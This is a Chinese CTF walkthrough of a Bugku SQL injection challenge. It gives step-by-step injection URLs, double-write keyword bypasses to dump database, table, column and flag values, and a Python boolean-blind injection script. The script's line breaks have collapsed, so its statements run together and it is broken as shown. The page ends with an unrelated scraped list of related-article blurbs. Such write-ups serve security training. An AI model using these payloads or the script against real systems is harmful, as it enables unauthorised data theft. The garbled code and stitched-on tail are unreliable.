本文内容为SQL手动注入步骤+想法,以及盲注脚本。

http://123.206.87.240:9004/1ndex.php?id=1

http://123.206.87.240:9004/1ndex.php?id=1'  报错

http://123.206.87.240:9004/1ndex.php?id=1'--+ 正常 存在注入

http://123.206.87.240:9004/1ndex.php?id=1' and 1=1 --+  报错 and被过滤,

http://123.206.87.240:9004/1ndex.php?id=1 ^(length(‘and’)!=0)^‘

使用length 判断过滤得出 or union select 被过滤

http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+  正常 双写绕过

http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 3 --+  报错 存在2个库

http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,2 --+  正常 回显2号位

对二号位进行注入

http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,database()--+

数据库名 web1002-1

http://123.206.87.240:9004/1ndex.php?id=1‘ aandnd 1=2 uunionnion sselectelect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema = database() --+

表名 flag1,hint

123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name = 'flag1' --+

字段 flag1,address

http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(flag1) from flag1 --+

flag1内容为:usOwycTju+FTUUzXosjr 填入发现不对,题目说有两个flag均为小写

http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,group_concat(address) from flag1 --+

address内容为下一关,点击进入下一关地址:http://123.206.87.240:9004/Once_More.php?id=1

http://123.206.87.240:9004/Once_More.php?id=1'  报错

http://123.206.87.240:9004/Once_More.php?id=1‘ --+  正常 存在注入

http://123.206.87.240:9004/Once_More.php?id=1’ order by 2 --+  正常

http://123.206.87.240:9004/Once_More.php?id=1’ order by 3 --+  报错 存在两个库

http://123.206.87.240:9004/Once_More.php?id=1‘ ^(length(‘union’)!=0)^’  正常 union被过滤

http://123.206.87.240:9004/Once_More.php?id=1‘ and 1=2 uunionnion select 1,2 --+  双写无法绕过

http://123.206.87.240:9004/Once_More.php?id=1’ and 1=2 Union select 1,2 --+  大小写无法绕过

http://123.206.87.240:9004/Once_More.php?id=1‘ ^(length(‘sleep’)!=0)^’  正常 sleep被过滤 substr也被过滤

由于正确错误返回不同 尝试写脚本Bool盲注

import sys
import requests
from bs4 import BeautifulSoup
import reurl_start = 'http://123.206.87.240:9004/Once_More.php?' sqldb ="id=1' and mid(database(),{0},1)='{1}'--+"sqltb ="id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema = database()),{0},1)='{1}'--+"
sqltest ="id=1' and mid((select group_concat(column_name) from information_schema.columns where table_name ='flag2'),{0},1)='{1}'--+"
sqlflag ="id=1' and mid((select flag2 from flag2),{0},1)='{1}'--+"def Brup(SQL):name=''for i in range(1,40):for ch in range(32,129):if ch == 128:sys.exit(0)payload = SQL.format(i,chr(ch))url_all = url_start+payload#print(url_all)html = requests.get(url_all)soup = BeautifulSoup(html.content, 'html.parser')result = soup.find_all(text = 'Hello,I Am Here!')#判断列表是否为空if len(result):name += chr(ch)print('name:'+name)breakif __name__ == '__main__':#Brup(sqldb)#Brup(sqltb)#Brup(sqltest)
    Brup(sqlflag)#tablename:class,flag2
#注:跑出来为大写,flag全为小写。

usOwycTju+FTUUzXosjr

web1002-1

转载于:https://www.cnblogs.com/Zhu013/p/11483305.html

BUGKU 多次 手动注入+脚本盲注相关推荐

  1. SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用

    Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...

  2. python实现sql宽字节注入+布尔盲注

    目录 一.注意点 二.代码 三.使用 1.获取 (简单方法) (复杂方法) 2.使用 四.测试 一.注意点 本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的,代码中的payload和参数都基 ...

  3. sql注入_1-4_post盲注

    sql注入_1-4_post盲注 一.post盲注概念 1.首先post盲注和get盲注一样,只是不会拼接到url中 2.post请求会向指定资源提交数据,请求服务器进行处理,如,表单提交,文件上传等 ...

  4. mysql注入之盲注语句汇总

    目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲 ...

  5. SQL注入2——盲注(重学)

    SQL注入--盲注 SQL注入--盲注 SQL注入--盲注 一.布尔型盲注 1.判断 2.盲注库名 3.盲注表名 4.盲注列名 5.盲注数据 时间型盲注 总结 一.布尔型盲注 假如网站一定存在SQL注 ...

  6. sql注入--布尔盲注

    sql注入–布尔盲注 靶场:sqli-labs-master 下载链接:靶场下载链接 第8关 盲注 php源码 <?php //including the Mysql connect param ...

  7. 【小迪安全】Day16web漏洞-SQL注入之盲注

    web漏洞-SQL注入之盲注 文章目录 web漏洞-SQL注入之盲注 前言 盲注类型 报错盲注 猜解数据库 猜解表 猜解字段 猜解内容 布尔盲注 猜解数据库 猜解表 猜解字段 猜解内容 延迟注入 前言 ...

  8. 手动SQL注入(盲注)讲解

    由于很多人(特别是针对初学者)在百度查找相关的SQL盲注的文章时总感觉无法得到一篇很基础,很完整的文章,所以在这里讲解一篇完整的SQL注入文章 1 查找源码之家等网站进行下载一个网站, 在这里我下载的 ...

  9. SQLi LABS Less 23 联合注入+报错注入+布尔盲注

    第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析 这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...

  10. SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注

    第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...

最新文章

  1. 织梦内容管理系统修改
  2. Python奇遇记:数据结构窥探2
  3. 数据产品设计专题(5)- 分布式数据仓库技术架构
  4. Java 内存模型 与 高效并发
  5. xml 需要转义
  6. 字符串匹配算法(三):KMP(KnuthMorrisPratt)算法
  7. 全球大学文凭“含金量”排名出炉:“北清复”名列30强
  8. 计算机故障按照产生机理来分可分为,维修自测题
  9. 2d Laser 和 camera 标定工具原理及使用方法
  10. 测试用例集-11.QQ表情收藏功能测试用例
  11. Excel的一些工作中不算是常见,但是遇到时常常不知所错的,问题,与解决方案。
  12. Vue自定义插件方法大全
  13. 6. laravel 控制器
  14. 40岁才博士毕业,新任安徽省长的他写了篇句句戳心的博士论文后记
  15. python自动答题助手_GitHub - SmileSmith/autoAnswer: 客户端答题工具,集成3个答题助手,包含AI自动答题,手动答题,adb控制多台手机等...
  16. 计算机一级怎么发送邮件到别人邮箱,电脑怎样发邮件到指定的邮箱地址(小白必须电脑操作邮件收发)...
  17. 又见猛犸象:基因剪刀重新定制生命
  18. 博弈论——4.1三人博弈的纳什均衡练习题
  19. 十大超级老牌黑客逐个曝光
  20. 怎么删除日历每日重复提醒事项

热门文章

  1. nvm nodejs npm快速安装
  2. python函数返回数组_从Cdef函数返回数组
  3. Mysql之查询基础select
  4. 确定进制(经典水题)
  5. activity android:launchmode,谨慎设置启动Activity的launchMode
  6. pytorch bert文本分类_一起读Bert文本分类代码 (pytorch篇 三)
  7. 【UVA10652】Board Wrapping(凸包+坐标旋转+多边形面积)
  8. html php连接mysql数据库连接,PHP如何连接MySQL数据库?附两种方法!
  9. java符号用语_java常用语
  10. 【optimization、pypi-packages、Github、GitCode、pip】optimtool介绍文档